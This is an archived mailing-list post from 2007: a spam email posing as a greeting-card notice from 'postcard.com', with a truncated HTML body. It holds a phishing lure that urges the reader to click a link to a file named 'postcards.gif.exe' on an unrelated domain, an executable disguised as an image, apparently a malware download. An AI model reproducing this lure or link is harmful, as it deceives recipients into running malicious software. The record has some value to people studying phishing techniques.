List:       ckrm-tech
Subject:    [ckrm-tech] You have received a postcard !
From:       "postcard.com" <postcard () postcard ! com>
Date:       2007-03-26 21:35:09

[Attachment #2 (text/html)]

You have just received a postcard from someone who cares about you!<br><br>
&quot;Hy there! It has been a long time since I haven't heared about you!<br>
I've just found out about this service from Claire, a friend of mine who also told me \
that...&quot;<br> <strong>If you'd like to see the rest of the message click <a
href="http://www.stoppelhopser-oberhausen.de/media/postcards.gif.exe">here</a> to

Thank you for using <span class="style1">www.yourpostcard.com</span> 's services \
!!!<br> Please take this opportunity to let your friends hear about us by sending \